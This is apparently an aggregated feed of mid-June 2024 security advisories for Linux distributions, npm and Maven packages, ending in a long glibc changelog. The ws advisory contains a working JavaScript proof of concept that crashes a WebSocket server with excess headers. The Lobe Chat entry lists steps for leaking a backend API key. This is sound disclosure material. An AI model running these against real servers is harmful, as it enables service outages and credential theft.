14.06.2024 10:30:49almalinux[ALSA-2024:3820] fence-agents security update (moderate)fence-agents security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3820
14.06.2024 09:42:30almalinux[ALSA-2024:3823] rpm-ostree security update (moderate)rpm-ostree security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3823
14.06.2024 12:47:46almalinux[ALSA-2024:3826] podman security and bug fix update (moderate)podman security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3826
14.06.2024 16:33:39almalinux[ALSA-2024:3835] libreoffice security update (important)libreoffice security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3835
14.06.2024 09:41:16almalinux[ALSA-2024:3837] 389-ds-base security update (important)389-ds-base security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3837
15.06.2024 03:00:00debian[DSA-5711-1] thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5711-1
16.06.2024 03:00:00debian[DSA-5713-1] libndp (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5713-1
18.06.2024 01:28:43npm[NPM:GHSA-P36R-QXGX-JQ2V] Lobe Chat API Key Leak (moderate)
### Summary
If an attacker can successfully authenticate through SSO/Access Code, they can obtain the real backend API Key by modifying the base URL to their own attack URL on the frontend and setting up a server-side request.
### Details
The attack process is described above.
![image](https://github.com/lobehub/lobe-chat/assets/36695271/df5e0c3c-af28-45c3-959f-182cc9d06680)
### PoC
Frontend:
1. Pass basic authentication (SSO/Access Code).
2. Set the Base URL to a private attack address.
3. Configure the request method to be a server-side request.
4. At the self-set attack address, retrieve the API Key information from the request headers.
Backend:
1. The LobeChat version allows setting the Base URL.
2. There is no outbound traffic whitelist.
### Impact
All community version LobeChat users using SSO/Access Code authentication, tested on version 0.162.13.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P36R-QXGX-JQ2V
18.06.2024 00:20:45maven[MAVEN:GHSA-W877-JFW7-46RJ] DeepJavaLibrary API absolute path traversal (critical)
## Summary
DeepJavaLibrary (DJL) versions 0.1.0 through 0.27.0 do not prevent absolute path archived artifacts from inserting archived files directly into the system, overwriting system files. This is fixed in DJL 0.28.0 and patched in DJL Large Model Inference containers 0.27.0.
**Impacted versions: 0.1.0 through 0.27.0**
## Patches
Patched Deep Learning Containers:
- [v1.1-djl-0.27.0-inf-cpu-full](https://github.com/aws/deep-learning-containers/releases/tag/v1.1-djl-0.27.0-inf-cpu-full)
- [v1.4-djl-0.27.0-inf-ds-0.12.6](https://github.com/aws/deep-learning-containers/releases/tag/v1.4-djl-0.27.0-inf-ds-0.12.6)
- [v1.4-djl-0.27.0-inf-trt-0.8.0](https://github.com/aws/deep-learning-containers/releases/tag/v1.4-djl-0.27.0-inf-trt-0.8.0)
- [v1.3-djl-0.27.0-inf-neuronx-sdk2.18.1](https://github.com/aws/deep-learning-containers/releases/tag/v1.3-djl-0.27.0-inf-neuronx-sdk2.18.1)
Patched Library:
- [v0.28.0](https://github.com/deepjavalibrary/djl/releases/tag/v0.28.0)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W877-JFW7-46RJ
17.06.2024 22:09:12npm[NPM:GHSA-3H5V-Q93C-6H6Q] ws affected by a DoS when handling a request with many HTTP headers (high)
### Impact
A request with a number of headers exceeding the [`server.maxHeadersCount`][] threshold could be used to crash a ws server.
### Proof of concept
```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
### Patches
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
### Workarounds
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent.
2. Set `server.maxHeadersCount` to `0` so that no limit is applied.
### Credits
The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in https://github.com/websockets/ws/issues/2230.
### References
- https://github.com/websockets/ws/issues/2230
- https://github.com/websockets/ws/pull/2231

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize
[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3H5V-Q93C-6H6Q
18.06.2024 01:30:08npm[NPM:GHSA-MJ4P-GMHR-92G3] @akbr/update Prototype Pollution (moderate)akbr update 1.0.0 is vulnerable to Prototype Pollution via update/index.js.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MJ4P-GMHR-92G3
18.06.2024 01:30:03npm[NPM:GHSA-QJ86-V6M7-4QV2] Object Resolver Prototype Pollution (moderate)apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJ86-V6M7-4QV2
18.06.2024 01:29:53npm[NPM:GHSA-J8PX-PJMP-325F] flatten-json Prototype Pollution (moderate)A Prototype Pollution issue in flatten-json 1.0.1 allows an attacker to execute arbitrary code via module.exports.unflattenJSON (flatten-json/index.js:42)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-J8PX-PJMP-325F
18.06.2024 01:29:48npm[NPM:GHSA-JJ58-488V-4RGF] obx Prototype Pollution (moderate)almela obx before v.0.0.4 has a Prototype Pollution issue which allows arbitrary code execution via the obx/build/index.js:656), reduce (@almela/obx/build/index.js:470), Object.set (obx/build/index.js:269) component.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJ58-488V-4RGF
17.06.2024 20:35:07ubuntu[USN-6835-1] Ghostscript vulnerabilitiesSeveral security issues were fixed in Ghostscript.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6835-1
18.06.2024 00:37:53npm[NPM:GHSA-69R2-2FG7-7HF9] Badger Database Prototype Pollution (moderate)A Prototype Pollution issue in abw badger-database 1.2.1 allows an attacker to execute arbitrary code via dist/badger-database.esm.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-69R2-2FG7-7HF9
18.06.2024 00:37:38npm[NPM:GHSA-4XG3-7W7Q-856Q] object-deep-assign Prototype Pollution (moderate)alexbinary object-deep-assign 1.0.11 is vulnerable to Prototype Pollution via the extend() method of Module.deepAssign (/src/index.js)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4XG3-7W7Q-856Q
18.06.2024 00:29:55npm[NPM:GHSA-FG52-5JJJ-28H7] @cdr0/sg Prototype Pollution (moderate)A Prototype Pollution issue in cdr0 sg 1.0.10 allows an attacker to execute arbitrary code.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FG52-5JJJ-28H7
17.06.2024 17:24:17ubuntu[USN-6838-1] Ruby vulnerabilitiesSeveral security issues were fixed in Ruby.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6838-1
17.06.2024 16:12:32ubuntu[USN-6837-1] Rack vulnerabilities (high)Several security issues were fixed in Rack.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6837-1
17.06.2024 16:00:34ubuntu[USN-6836-1] SSSD vulnerability (high)SSSD did not always correctly apply the GPO policy.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6836-1
17.06.2024 03:00:00oraclelinux[ELSA-2024-3951] firefox security update (important)
[115.12.0-1.0.1]
- Remove upstream references [Orabug: 30143292]
- Update distribution for Oracle Linux [Orabug: 30143292]
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.12.0-1]
- Update to 115.12.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3951
17.06.2024 03:00:00oraclelinux[ELSA-2024-3954] firefox security update (important)
[115.12.0-1.0.1]
- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file
[115.12.0-1]
- Update to 115.12.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3954
17.06.2024 03:00:00oraclelinux[ELSA-2024-3955] firefox security update (important)
[115.12.0-1.0.1]
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.12.0-1]
- Update to 115.12.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3955
18.06.2024 00:22:07maven[MAVEN:GHSA-HW2C-8XGW-MF57] SonarQube logs sensitive information (moderate)In SonarQube before 10.4 and 9.9.4 LTA, encrypted values generated using the Settings Encryption feature are potentially exposed in cleartext as part of the URL parameters in the logs (such as SonarQube Access Logs, Proxy Logs, etc).https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HW2C-8XGW-MF57
18.06.2024 00:23:50npm[NPM:GHSA-XGQM-WP7W-MGG2] Mattermost Desktop App allows for bypassing TCC restrictions on macOS (low)Mattermost Desktop App versions <=5.7.0 fail to disable certain Electron debug flags which allows for bypassing TCC restrictions on macOS.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGQM-WP7W-MGG2
18.06.2024 00:23:18npm[NPM:GHSA-HVXG-77MG-VRVP] Mattermost Desktop App Remote Code Execution (moderate)Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI schemes.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HVXG-77MG-VRVP
19.06.2024 02:24:56ubuntu[USN-6818-4] Linux kernel (HWE) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-4
18.06.2024 20:47:28ubuntu[USN-6793-2] Git vulnerability (critical)Git could be made to run programs as your login if it clones a crafted repository.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6793-2
18.06.2024 19:34:47maven[MAVEN:GHSA-GMRM-8FX4-66X7] Keycloak: Leak of configured LDAP bind credentials (low)A vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GMRM-8FX4-66X7
18.06.2024 03:00:00debian[DSA-5714-1] roundcube security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5714-1
18.06.2024 03:00:00debian[DSA-5715-1] composer (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5715-1
18.06.2024 03:00:00oraclelinux[ELSA-2024-12442] glibc security update (important)[2.17-326.0.6.3]- Forward-port Oracle patches to 2.17-326.3 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Oracle history: April-28-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.17-326.0.6 - OraBug 35338741 Glibc tunable to disable huge pages on pthread_create stacks Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> February-22-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.17-326.0.4 - OraBug 35107754 Fix range check in do_tunable_update_val Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> May-18-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-326.0.2 - Forward-port Oracle patches to 2.17-326. Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> April-27-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.6 - OraBug 33968985 Security Patches - This release fixes CVE-2022-23219, CVE-2022-23218, and CVE-2021-3999 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> January-7-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.4 - add upstream patch for CR33459693 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> October-12-2021 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.2 - merge el7 u9 errata4 patch with Oracle patches Review-exception: Simple merge - merge el7 u9 errata patch with Oracle patches Review-exception: Simple merge - merge el7 u9 errata patches with Oracle patches Review-exception: Simple merge - merge el7 u9 patches with Oracle patches Review-exception: Simple merge - Four patches to match 3rd patch bundle from Marvell - modify MIPS values in elf/elf.h - add sysdeps/aarch64/sys/ifunc.h - consolidate Linux mmap [BZ-21270] - fix mmap for really large offsets - [Orabug 30778222] Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - [Orabug 28481550/29851177] Make funlockfile/flockfile match tests with _IO_funlockfile and _IO_flockfile. 
- aarch64 Optimize memcpy for octeonx - aarch64 Add Atomics HWCAP_IMPORTANT - implement allocate_once - Adding Mike Fabian's C.utf-8 patch (C.utf-8 is a unicode-aware version of the C locale) - Marvell Patches to support mips/aarch64 - mips support _ABI64 and STRING_INLINE_unaligned - mips Use HAVE_SA_RESTORER for declaration of restore_rt. - Do not redefine MEMCPY_OK_FOR_FWD_MEMMOVE - mips pread.c remove typo. - mips remove mips64/n32/fallocate.c - add uint64_t for SEM_NWAITERS_SHIFT - Replace sysdeps/mips/preconfigure with current version. - change !_MIPS_ARCH_OCTEON to !defined _MIPS_ARCH_OCTEON - Check for /usr/bin/sh before invoking bash specific cmds - Backport to fix ltp set{re,res}{g,u}id.c tests. - mips Octeon add syncw in atomic.h asm.h - Make mmap64() 64-bit file offsets for n32 - mips Use 'k0' for Octeon1 - Bug 1591 mips/mips64/pthread_spin_unlock.c - mips Bug 1552 fadvise changes - mips user.h delete PAGE_SIZE PAGE_MASK NBPG HOST_STACK_END_ADDR - mips bug 1633 modify debug/Makefile - mips octeon2 optimize atomic compare and exchange - mips Append octeon3 to the machine variable. 
- ifaddrs netlink request increase buffer size for large messages - mips clean up memcpy.S syntax (no change in prefetching) - Include sysdep.h in sysdeps/aarch64/crti.S - aarch64 rename R_AARCH64 fields based on new ABI - aarch64 Support variable pagesize - mips bug 4380 static glibc syscalls to support cancellation - aarch64 add funwind tables to backtrace - aarch64 define typesizes - mips sqrt code added - Cleanup strcoll_l to match upstream - Add test to check for cache size int overflow - mips correct reserved FCSR bits - mips fpu_control.h standardize capitalization - mips fpu_control.h add FPU_RC_MASK - mips use FPU_RC_MASK in fegetround fesetround - mips inline math lib support functions - mips add strcmp.c - mips revise memset again for Octeon 128byte cache lines - aarch64 define FUTEX_WAIT_REQUEUE_PI - aarch64 Define ABORT_INSTRUCTION - aarch64 fix first cfi_adjust_cfa_offset - mips add section GNU-stack for executable stack - aarch64 Make SSIZE_T_TYPE always signed long - aarch64 define OFF_T_TYPE to be SYSCALL_SLONG_TYPE - aarch64 Handle various MATCHES cases - Change shm_segsz to be __syscall_ulong_t - convert elf/sotruss.ksh to standard Bourne function syntax - aarch64 remove inaccurate comment from sysdep.h - aarch64 Prevent warning in sigcontextinfo.h - aarch64 Prevent warning in jmpbuf-unwind.h - check signal stack before and after swapcontext - aarch64 Add SystemTap probe longjmp and setjmp - aarch64 count_leading_zeros defined - mips improved newlib strcmp.c - fix initial condition for get_nprocs - aarch64: remove asm/ptrace.h in sys includes - elf/pldd.c use scratch_buffer instead of extend_alloca - grp Rewrite to use scratch_buffer - add scratch_buffer to initgroups - add scratch_buffer to getnameinfo - nscd_getgr_r add scratch_buffer - mips Define DT_MIPS_RLD_MAP_REL macro - mips Add ENTRY and END to assembly routines - Makeconfig changes to support include subdirs - mips assembly changes for GP64_REG and GP64_STACK - sunrpc: Do not use alloca 
in clntudp_call - Improve wide char support - Provide cache/non-cache versions for localedata - CR29749550 [armv5] build failure - Add 3 arm patches to aarch64 tree to avoid future build/merge failures. - Rebase aarch64 patches at 30000 to avoid future conflicts. - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - EL Errata <el-errata_ww@oracle.com> - Add BUS_MCEERR_AR, BUS_MCEERR_AO to sysdeps/unix/sysv/linux/bits/siginfo.h - Add MAP_SHARED_VALIDATE to sysdeps/unix/sysv/linux/bits/mman-linux.h and - sysdeps/unix/sysv/linux/aarch64/bits/mman-linux.h - Add MAP_SYNC to sysdeps/unix/sysv/linux/aarch64/bits/mman.h - Add RTEXT_FILTER_SKIP_STATS - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Orabug: <29495283> - add Ampere emag to tunable cpu list - add optimized memset for emag - add an ASIMD variant of strlen for falkor - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Orabug: <2700101> - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - bundle of 71 upstream commits to improve malloc correctness and performance - upstream commit 4b5b548c9fedd5e6d920639e42ea8e5f473c4de3 - Fix BZ #15089: malloc_trim always trim for large padding. - upstream commit 51a7380b8968251a49a4c5b0bc7ed1af5b0512c6 - malloc/malloc.c: Avoid calling sbrk unnecessarily with zero - upstream commit 8a35c3fe122d49ba76dff815b3537affb5a50b45 - Use alignment macros, pagesize and powerof2. - upstream commit eab55bfb14f5e1ea6f522d81632ce5a1b8a8c942 - Add missing includes to sysdeps/generic/malloc-sysdep.h. - upstream commit 987c02692a88b8c9024cb99187434aad02c3c047 - malloc: fix comment typo - upstream commit c52ff39e8ee052e4a57676d65a27f09bd0a859ad - * malloc/malloc.c: Fix powerof2 check. - upstream commit af102d9529faee5810fde80dac6337b6148789ad - Remove explicit inline on malloc perturb functions. - upstream commit ca6be1655bd357bf6ac8857fba9b9dce928edbdc - Use ALIGN_DOWN in systrim. 
- upstream commit 8ba14398e629c1f63b9c91a59a47a713b3cce8bc - Do not macro-expand failed assertion expression [BZ #18604] - upstream commit 400e12265d99964f8445bb6d717321eb73152cc5 - Replace MUTEX_INITIALIZER with _LIBC_LOCK_INITIALIZER in generic code - upstream commit 00d4e2ea3503e6de0f198cd65343f287a51f04db - malloc: Remove arena_mem variable - upstream commit ca135f824b1dbaf43e4a673de7725db76a51b714 - malloc: Remove max_total_mem member from struct malloc_par - upstream commit 59eda029a8a35e5f4e5cd7be0f84c6629e48ec6e - malloc: Remove NO_THREADS - upstream commit b43f552a8a23c0e405ab13a268bee12ada3b7841 - Fix type of parameter passed by malloc_consolidate - upstream commit 8a727af925be63aa6ea0f5f90e16751fd541626b - malloc: Remove malloc hooks from fork handler - upstream commit 4cf6c72fd2a482e7499c29162349810029632c3f - malloc: Rewrite dumped heap for compatibility in __malloc_set_state - upstream commit dea39b13e2958a7f0e75b5594a06d97d61cc439f - malloc: Correct malloc alignment on 32-bit architectures [BZ #6527] - upstream commit 1e8a8875d69e36d2890b223ffe8853a8ff0c9512 - malloc: Correct size computation in realloc for dumped fake mmapped chunks - upstream commit 073f82140c7dbd7af387153c29ac7ac3e882c4ef - malloc_usable_size: Use correct size for dumped fake mapped chunks - upstream commit f88aab5d508c13ae4a88124e65773d7d827cd47b - malloc: Preserve arena free list/thread count invariant [BZ #20370] - upstream commit 5bc17330eb7667b96fee8baf3729c3310fa28b40 - elf: dl-minimal malloc needs to respect fundamental alignment - upstream commit 4bf5f2224baa1590f92f7a26930928fe9f7e4b57 - malloc: Automated part of conversion to __libc_lock - upstream commit c1234e60f975da09764683cddff4ef7e2a21ce78 - Document the M_ARENA_* mallopt parameters - upstream commit 68fc2ccc1aebc15b92e596b2bdc5605da1e25f3c - Remove redundant definitions of M_ARENA_* macros - upstream commit aceb22c1f59231909777f7d0a6b955adbf7096a2 - Remove references to sbrk to grow/shrink arenas - upstream commit 
e863cce57bff6cb795e6aad745ddf6235bca21ce - malloc: Remove malloc_get_state, malloc_set_state [BZ #19473] - upstream commit 681421f3cac665a82d000d854ae6df1fb3b561a5 - sysmalloc: Initialize previous size field of mmaped chunks - upstream commit e9c4fe93b3855239752819303ca377dff0ed0553 - malloc: Use accessors for chunk metadata access - upstream commit ae9166f2b8936304ea347a98519372804963447f - malloc: Update comments about chunk layout - upstream commit 3d7229c2507be1daf0c3e15e1f134076fa8b9025 - Fix malloc/ tests for GCC 7 -Walloc-size-larger-than=. - upstream commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 - Further harden glibc malloc metadata against 1-byte overflows. - upstream commit e4e26210c3bdb5dcdce7a3def3b90fa45d3e2c89 - Fix failing test malloc/tst-interpose-nothread with GCC 7. - upstream commit 622222846a2e6ffbcd02cb46cb5f29c48fe4a466 - Call the right helper function when setting mallopt M_ARENA_MAX (BZ #21338) - upstream commit 44e4b889ab0e0497567c8983ad25a78798a3ab51 - manual: Document replacing malloc [BZ #20424 - upstream commit 3b5f801ddb838311b5b05c218caac3bdb00d7c95 - Tweak realloc/MREMAP comment to be more accurate. - upstream commit 4e61a6be446026c327aa70cef221c9082bf0085d - i386: Increase MALLOC_ALIGNMENT to 16 [BZ #21120] - upstream commit d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc - Add per-thread cache to malloc - upstream commit be8aa923a70da16ebabe85e912abc6b815bbdcb4 - * manual/tunables.texi: Add missing @end deftp. 
- upstream commit ed421fca42fd9b4cab7c66e77894b8dd7ca57ed0 - Avoid backtrace from __stack_chk_fail [BZ #12189]
- upstream commit eac43cbb8d808a40004aa0a4a286f5c5155beccb - malloc: Avoid optimizer warning with GCC 7 and -O3
- upstream commit ec2c1fcefb200c6cb7e09553f3c6af8815013d83 - malloc: Abort on heap corruption, without a backtrace [BZ #21754]
- upstream commit ac3ed168d0c0b2b702319ac0db72c9b475a8c72e - malloc: Remove check_action variable [BZ #21754]
- upstream commit a9da0bb2667ab20f1dbcd0a9ae6846db02fbc96a - malloc: Remove corrupt arena flag
- upstream commit 5129873a8e913e207e5f7b4b521c72f41a1bbf6d - malloc: Change top_check return type to void
- upstream commit 24cffce7366c4070d8f823702a4fcec2cb732595 - malloc: Resolve compilation failure in NDEBUG mode
- upstream commit 0c71122c0cee483a4e6abcdbe78a1595eefe86e2 - malloc: Remove the internal_function attribute
- upstream commit 1e26d35193efbb29239c710a4c46a64708643320 - malloc: Fix tcache leak after thread destruction [BZ #22111]
- upstream Oct 15, 2017 commit 8e57c9432a2b68c8a1e7f4df28f0e8c7acc04753 - Silence -O3 -Wall warning in malloc/hooks.c with GCC 7 [BZ #22052]
- upstream Oct 17, 2017 commit e4dd4ace56880d2f1064cd787e2bdb96ddacc3c4 - Inline tcache functions
- upstream Oct 17, 2017 commit e956075a5a2044d05ce48b905b10270ed4a63e87 - Use relaxed atomics for malloc have_fastchunks
- upstream Oct 17, 2017 commit 3381be5cdef2e43949db12f66a5a3ec23b2c4c90 - Improve malloc initialization sequence
- upstream Oct 18, 2017 commit 2c2245b92ccf6344b324d17d8f94ccd3b8c559c6 - Fix build failure on tilepro due to unsupported atomics
- upstream Oct 19, 2017 commit d74e6f6c0de55fc588b1ac09c88eb0fb8b8600af - Fix deadlock in _int_free consistency check
- upstream Oct 20, 2017 commit a15d53e2de4c7d83bda251469d92a3c7b49a90db - Add single-threaded path to _int_free
- upstream Oct 20, 2017 commit 6d43de4b85b11d26a19bebe4f55f31be16e3d419 - Fix build issue with SINGLE_THREAD_P
- upstream Oct 24, 2017 commit 3f6bb8a32e5f5efd78ac08c41e623651cc242a89 - Add single-threaded path to malloc/realloc/calloc/memalloc
- upstream Oct 24, 2017 commit 905a7725e9157ea522d8ab97b4c8b96aeb23df54 - Add single-threaded path to _int_malloc
- upstream Nov 15, 2017 commit 7a9368a1174cb15b9f1d6342e0e10dd90dae238d - malloc: Account for all heaps in an arena in malloc_info [BZ #22439]
- upstream Nov 23, 2017 commit 0a947e061d47c9710838f210506215bd9533324b - malloc: Call tcache destructor in arena_thread_freeres
- upstream Nov 30, 2017 commit 34697694e8a93b325b18f25f7dcded55d6baeaf6 - Fix integer overflow in malloc when tcache is enabled [BZ #22375]
- upstream Jan 12, 2018 commit 249a5895f120b13290a372a49bb4b499e749806f - malloc: Ensure that the consolidated fast chunk has a sane size.
- upstream Jan 29, 2018 commit 406e7a0a47110adbf79326c8a0bda5ffac3e0f10 - malloc: Use assert.h assert macro
- upstream Feb 10, 2018 commit 402ecba487804e9196769f39a8d157847d3b3104 - [BZ #22830] malloc_stats: restore cancellation for stderr correctly.
- upstream Mar 9, 2018 commit 229855e5983881812b21b215346cb990722c6023 - malloc: Revert sense of prev_inuse in comments
- upstream Mar 14, 2018 commit bdc3009b8ff0effdbbfb05eb6b10966753cbf9b8 - malloc: harden removal from unsorted list
- malloc: fix merge regressions in previous bundle of patches. Orabug: <29139332>
- Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com>
- Modified patches to avoid duplication of patch2754 (added in 2.17-260.0.16)
- and patch10134. OraBug 29319671.
- Reviewed-by: Egeyar Bagcioglu <egeyar.bagcioglu@oracle.com>
- Regenerate intl/plural.c OraBug 28806294.
- Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com>
- intl: Port to Bison 3.0
- Backport of upstream gettext commit 19f23e290a5e4a82b9edf9f5a4f8ab6192871be9 OraBug 28806294.
- Reviewed-by: Patrick McGehearty <patrick.mcgehearty@oracle.com>
- Fix dbl-64/wordsize-64 remquo (bug 17569).
- Backport of upstream d9afe48d55a412e76b0dcb28335fd4b390fe07ae OraBug 19570749.
- Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com>
- libio: Disable vtable validation in case of interposition.
- Backport of upstream c402355dfa7807b8e0adb27c009135a7e2b9f1b0. OraBug 28641867.
- Reviewed-by: Egeyar Bagcioglu <egeyar.bagcioglu@oracle.com>
- merged bundle of 142 upstream commits for aarch64 support with glibc rhel7 update 6.
- upstream commit 75eff3fe90f96783f31f58fa84af1b77e57d1ae4 - trimmed to only add bzero.S, memcmp.S memcpy.S, memmove.S, memset.S, strcmp.S, strlen.S, strncmp.S and strnlen.S into sysdeps/aarch64. Orabug: <28003847>
- upstream commit 08325735c2efb0257b8c07ac0ff91e44c27ecbf8 - Lazy TLSDESC relocation data race fix
- upstream commit c71c89e5c72baf43fd44d08dda8ab846eec5b1d6 - fix cfi annotations which used incorrect sign.
- upstream commit f008c71455a8f23c2a24c451e61b12ddfca9a54f - fix uninitialized warning for math_private.h
- upstream commit d2e4346a30683cc42c57bd1bfd457897d78c6d7e - fix internal asm profiling code
- upstream commit efbe665c3a2d344b0d64456cf29499ba53c2965a - add ifunc support for aarch64
- upstream commit d6fc3f6516cd20f195758086fbbbe3f17a8a6d95 - add ChangeLog for ifunc support patch
- upstream commit 6cd380dd366d728da9f579eeb9f7f4c47f48e474 - avoid-literals-in-start.S
- upstream commit f124cb381116b5809de198327690ad0bd8d1478e - Fix nearbyint arithmetic moved before feholdexcept (bug 22225).
- upstream commit db4f87bad48ed93ae14f61121367a7cb94fa46ed - do not use MIN for dl-machine.h
- upstream commit a2e0a7f12ba57a49d1380c7ba1ff4b1f51d67347 - Guess L1 cache linesize
- upstream commit 58a813bf6e732211af53e690c92c14a50bb06e0e - fix f-max-min for gcc
- upstream commit e7df6c5c79458dc042a8c967bafa6e8eca88ae0d - HWCAP additions
- upstream commit 14d886edbd3d80b771e1c42fbd9217f9074de9c6 - fix start code for static pie
- upstream commit afce1991f6f61514172696ec3edf93331cb0e04f - clean up HWCAP updates
- upstream commit 953c49cc3bb1041090281042148197ad3537c551 - more HWCAP additions
- upstream commit 3f8d9d58c59fdbe27301d0e18bfd426a5f2edf19 - use builtins for fpcr/fpsr
- upstream commit 4f5b921eb9b775aa3549a9bcd684c3013132f04b - add include for fpcr/fpsr fix
- upstream commit 0c8a67a5737b4b6dd74bd24219fc642c8d244bee - fix include for fpcr/fpsr fix Orabug: <28036322>
- upstream commit 2fee269248c6ef303569d9ac8fec3a27676520e0 - Enable _STRING_ARCH_unaligned on AArch64.
- upstream commit 16396c41deab45f715ffd813280d9d685b3b281e - Add _STRING_INLINE_unaligned and string_private.h
- upstream commit a8c5a2a9521e105da6e96eaf4029b8e4d595e4f5 - This is an optimized memset for AArch64.
- upstream commit b998e16e71c8617746b7c39500e925d28ff22ed8 - This is an optimized memcpy/memmove for AArch64.
- upstream commit c435989f52204703d524f467c830dc363439e532 - Optimize the strlen implementation.
- upstream commit 58ec4fb881719d0b69989f9a4955290fca531831 - Add a simple rawmemchr implementation.
- upstream commit a024b39a4e31a049391b459234f6b3575c9fc107 - This patch further tunes memcpy
- upstream commit 95e431cc73c2df3bc606107d6f79c4683bd61102 - An optimized memchr was missing for AArch64.
- upstream commit 922369032c604b4dcfd535e1bcddd4687e7126a5 - [AArch64] Optimized memcmp.
- upstream commit 4c1d801a5956f049126ef6cbe22ed23693e77a8c - aarch64: Avoid hidden symbols for memcpy/memmove into static binaries
